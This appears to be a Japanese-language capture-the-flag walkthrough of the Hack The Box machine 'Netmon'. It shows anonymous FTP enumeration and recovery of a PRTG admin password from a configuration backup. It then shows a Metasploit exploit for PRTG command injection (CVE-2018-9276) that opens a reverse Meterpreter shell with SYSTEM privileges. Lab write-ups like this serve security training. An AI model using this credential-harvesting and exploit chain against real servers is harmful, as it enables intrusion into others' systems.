Open roaris opened 6 months ago
Anonymous FTP login allowed (FTP code 230)
とあるので試す
$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:roaris): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49878|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
/Users/Public/Desktop/user.txtがあるのを見つけた Desktopまでいかないとget出来ないのね...
ftp> get Users/Public/Desktop/user.txt
local: Users/Public/Desktop/user.txt remote: Users/Public/Desktop/user.txt
ftp: Can't access `Users/Public/Desktop/user.txt': No such file or directory
ftp> cd Users/Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49921|)
150 Opening ASCII mode data connection.
100% |*****************************************| 34 0.08 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
/Users/Administratorにはアクセスできない
ftp> dir Users/Administrator
229 Entering Extended Passive Mode (|||49890|)
550 Access is denied.
ポート80をブラウザで確認すると、PRTG Network Monitorというアプリケーションのログイン画面が出てきた SecListsを確認したが、ヒットせず
$ find /usr/share/SecLists -iname *prtg*
default credentialがprtgadmin
/ prtgadmin
と出てきたので、これも試すが駄目だった
FTP側をもう少し見てみる
https://e-words.jp/w/.lnk%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB.html .InkはWindowsのショートカットファイルらしい
ftp> dir Users/Public/Desktop
229 Entering Extended Passive Mode (|||50103|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1195 PRTG Enterprise Console.lnk
02-02-19 11:18PM 1160 PRTG Network Monitor.lnk
02-23-24 08:09AM 34 user.txt
226 Transfer complete.
Program Files (x86)/PRTG Network Monitor を見ても、ログインに繋がるような情報が見つからない
ftp> dir Program\ Files\ (x86)/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50361|)
125 Data connection already open; Transfer starting.
02-02-19 11:17PM <DIR> 64 bit
02-02-19 11:15PM 1888 activation.dat
02-02-19 11:18PM <DIR> cert
12-14-17 12:40PM 2461696 chartdir51.dll
12-14-17 12:40PM 9077248 ChilkatDelphiXE.dll
12-14-17 12:40PM 2138986 chrome.pak
02-02-19 11:17PM <DIR> Custom Sensors
12-14-17 12:40PM 382464 dbexpmda40.dll
12-14-17 12:40PM 519680 dbexpoda40.dll
12-14-17 12:40PM 377856 dbexpsda40.dll
12-14-17 12:40PM 5681 defaultmaps.xml
12-14-17 12:40PM 12871 defaultmaps_iad.xml
02-13-18 02:08PM 1224 deviceiconlist.txt
02-02-19 11:17PM <DIR> devicetemplates
02-23-24 08:08AM <DIR> dlltemp
02-02-19 11:18PM <DIR> download
12-14-17 12:40PM 6667 ethertype.txt
12-14-17 12:40PM 6218 FlowRules.osr
02-02-19 11:18PM <DIR> helperlibs
12-14-17 12:40PM 9956864 icudt.dll
12-14-17 12:40PM 1665 ipmi_bsd-2.0.txt
02-02-19 11:16PM <DIR> language
12-14-17 12:40PM 3707349 Lb2to3.exe
12-14-17 12:40PM 24978944 libcef.dll
12-14-17 12:40PM 1412096 libeay32.dll
02-02-19 11:17PM <DIR> locales
02-02-19 11:18PM <DIR> lookups
02-16-18 10:03AM 796566 macmanufacturerlist.txt
02-02-19 11:18PM <DIR> MIB
12-14-17 12:40PM 522 Microsoft.VC80.CRT.manifest
12-14-17 12:40PM 421200 msvcp100.dll
12-14-17 12:40PM 770384 msvcr100.dll
12-14-17 12:40PM 630544 msvcr80.dll
12-14-17 12:40PM 12498 netsnmp-license.txt
02-02-19 11:17PM <DIR> Notifications
12-14-17 12:40PM 0 Npgsql.txt
12-14-17 12:40PM 487936 openssl.exe
01-18-18 10:03AM 177152 paelibssh.dll
12-14-17 12:40PM 35088 paesslerchart.dll
12-14-17 12:40PM 1083904 PaesslerSNMP.dll
02-15-18 04:24PM 1074688 PaesslerSNMPWrapper.dll
12-14-17 12:40PM 421160 PaesslerSQLEngine.dll
12-14-17 12:40PM 193832 PaesslerSQLEngineDBX.dll
12-14-17 12:40PM 331536 paesslerVMWareShell.exe
12-14-17 12:40PM 310032 paesslerVMWareShell.vshost.exe
12-14-17 12:40PM 1429 phantomjs-license.bsd
12-14-17 12:40PM 1428 protocol.txt
02-16-18 10:04AM 6379096 PRTG Administrator.exe
02-16-18 10:05AM 12923480 PRTG Enterprise Console.exe
02-16-18 10:04AM 5439576 PRTG GUI Starter.exe
02-02-19 11:17PM <DIR> PRTG Installer Archive
02-16-18 10:05AM 11647576 PRTG Probe.exe
02-16-18 10:05AM 7026776 PRTG Server.exe
02-02-19 11:18PM 2000256 PRTG Setup Log.log
02-02-19 11:17PM <DIR> prtg-installer-for-distribution
12-14-17 12:40PM 300318 prtg.ico
12-14-17 12:40PM 444640 PrtgDllWrapper.exe
02-16-18 10:04AM 2778200 PRTGProbeUpdate.exe
02-16-18 10:04AM 3227224 PrtgRemoteInstall.exe
02-16-18 10:04AM 2782808 PRTGServerUpdate.exe
02-16-18 10:04AM 2104408 PRTG_Chromium_Helper.exe
02-16-18 10:04AM 2264664 PRTG_IE_Helper.exe
02-02-19 11:17PM <DIR> Python34
02-16-18 10:04AM 1012224 RegWrapper.exe
02-02-19 11:17PM <DIR> Sensor System
02-02-19 11:17PM <DIR> snmplibs
02-02-19 11:18PM <DIR> snmptemp
01-18-18 10:03AM 461824 ssh.dll
12-14-17 12:40PM 384512 ssleay32.dll
02-02-19 11:18PM <DIR> themes
02-02-19 11:18PM 1275563 unins000.dat
02-02-19 11:15PM 1498815 unins000.exe
12-14-17 12:40PM 1163024 VimService2005.dll
12-14-17 12:40PM 4312848 VimService2005.XmlSerializers.dll
02-02-19 11:17PM <DIR> webroot
226 Transfer complete.
prtg network monitor configuration location
で検索すると、
https://kb.paessler.com/en/topic/89431-how-to-copy-data-files-and-custom-files-from-prtg-data-directory#:~:text=The%20PRTG%20Data%20folder%20by,configuration%20of%20your%20PRTG%20server.
The PRTG Data folder by default located under "C:\ProgramData\Paessler\PRTG Network Monitor" contains all the monitoring data (logs, historic data, tickets, reports, etc.) as well as the configuration of your PRTG server. The content of this folder must be copied on the new server (in the same folder) if you want to keep this data.
と出てくる
ftp> dir
229 Entering Extended Passive Mode (|||50542|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
ルートでdirをしてもProgramDataなんて出てこないのに、あるらしい
ftp> dir ProgramData/Paessler/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
08-18-23 07:20AM <DIR> Configuration Auto-Backups
02-23-24 08:09AM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
02-23-24 08:09AM <DIR> Logs (Web Server)
02-23-24 08:14AM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
02-23-24 08:50AM 1680940 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
PRTG Configuration.dat, PRTG Configuration.old, PRTG Configuration.old.bakの3つをダウンロードして確認する 全てXMLファイルだった
password
で検索をかけると、PRTG Configuration.old.bakに、prtgadmin
のパスワードがPrTg@dmin2018
であるという情報が書かれていた
しかし、old.bakとあるように、過去の設定のバックアップファイルなので、prtgadmin
/ PrTg@dmin2018
でログインすることは出来ない
2018年に設定したパスワードっぽいので、prtgadmin
/ PrTg@dmin2019
を試すが、これでもいけない
writeupを見ても、prtgadmin
/ PrTg@dmin2019
で正しいらしいのだが...
Machineを再起動したら、prtgadmin
/ PrTg@dmin2019
でログインできた
意味不明すぎるだろ...
ざっとページを眺めたが、特にフラグは見当たらない バージョン18.1.37.13946とある
prtg 18.1.37 exploit
で検索すると、コマンドインジェクションの脆弱性(CVE-2018-9276)があると出てきた
exploit/windows/http/prtg_authenticated_rce を試す
msf6 > search prtg
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/prtg_authenticated_rce_cve_2023_32781 2023-08-09 excellent Yes PRTG CVE-2023-32781 Authenticated RCE
1 exploit/windows/http/prtg_authenticated_rce 2018-06-25 excellent Yes PRTG Network Monitor Authenticated RCE
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/prtg_authenticated_rce
shellと打つとシェルが起動する
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.10.10.152
RHOSTS => 10.10.10.152
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/http/prtg_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (176198 bytes) to 10.10.10.152
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.152:50022) at 2024-02-23 23:41:35 +0900
meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
root.txtを見つけて終わり
C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Administrator\Desktop
02/23/2024 09:26 AM 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 6,723,411,968 bytes free
https://app.hackthebox.com/machines/Netmon